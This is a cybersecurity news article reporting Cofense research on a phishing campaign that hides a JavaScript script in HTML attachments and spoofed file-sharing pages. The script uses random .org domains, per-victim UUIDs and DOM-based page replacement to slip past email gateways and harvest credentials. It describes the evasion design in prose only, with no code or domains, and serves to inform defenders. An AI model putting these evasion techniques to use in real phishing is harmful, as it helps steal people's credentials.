A sophisticated phishing campaign leveraging randomly generated Universal Unique Identifiers (UUIDs) has emerged, successfully bypassing Secure Email Gateways (SEGs) and evading perimeter defenses.
The attack employs an advanced JavaScript-based phishing script combining random domain selection, dynamic UUID generation, and server-driven page replacement to steal credentials.
Unlike conventional phishing operations relying on static redirects, this campaign demonstrates tactical precision.
The phishing script operates by embedding malicious code within HTML attachments or spoofed file-sharing platforms such as Microsoft OneDrive, SharePoint Online, DocuSign, and Adobe Acrobat Sign.
When victims interact with seemingly legitimate documents, the script activates and selects one .org domain at random from nine predefined addresses.
These domains appear bulk-generated without recognizable word patterns, deliberately designed to evade blocklists and machine learning detection systems.
The script generates a dynamic UUID to track individual victims while utilizing a hardcoded UUID as a campaign identifier.
Cofense researchers identified this unusual tactic in early February 2025, noting its ongoing nature and sophistication.
The dual UUID mechanism stands out as particularly uncommon in phishing operations.
.webp "New Phishing Attack Bypasses Using UUIDs Unique to Bypass Secure Email Gateways 3")
After domain selection and UUID generation, the script sends an HTTPS POST request to the chosen server’s API endpoint.
The server responds with dynamically generated content tailored to the victim’s context, such as personalized corporate login pages.
This approach enables threat actors to replace webpage content without changing URLs.
Dynamic Page Replacement
The most deceptive aspect involves dynamic page replacement capability, manipulating browser sessions to deliver credential phishing pages without traditional redirects.
Rather than using window.location.href redirects changing visible URLs, this script employs DOM manipulation techniques to replace page content with server-provided HTML.
.webp "New Phishing Attack Bypasses Using UUIDs Unique to Bypass Secure Email Gateways 4")
The server-driven nature allows real-time customization based on victim context. When users enter email addresses, the script extracts domains and signals backend infrastructure to generate corresponding branded login pages.
This personalization significantly increases victim trust while reducing suspicion. The seamless experience maintained throughout proves critical for successful credential harvesting, demonstrating how modern attacks have evolved beyond simple email deception into sophisticated browser-based manipulation.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
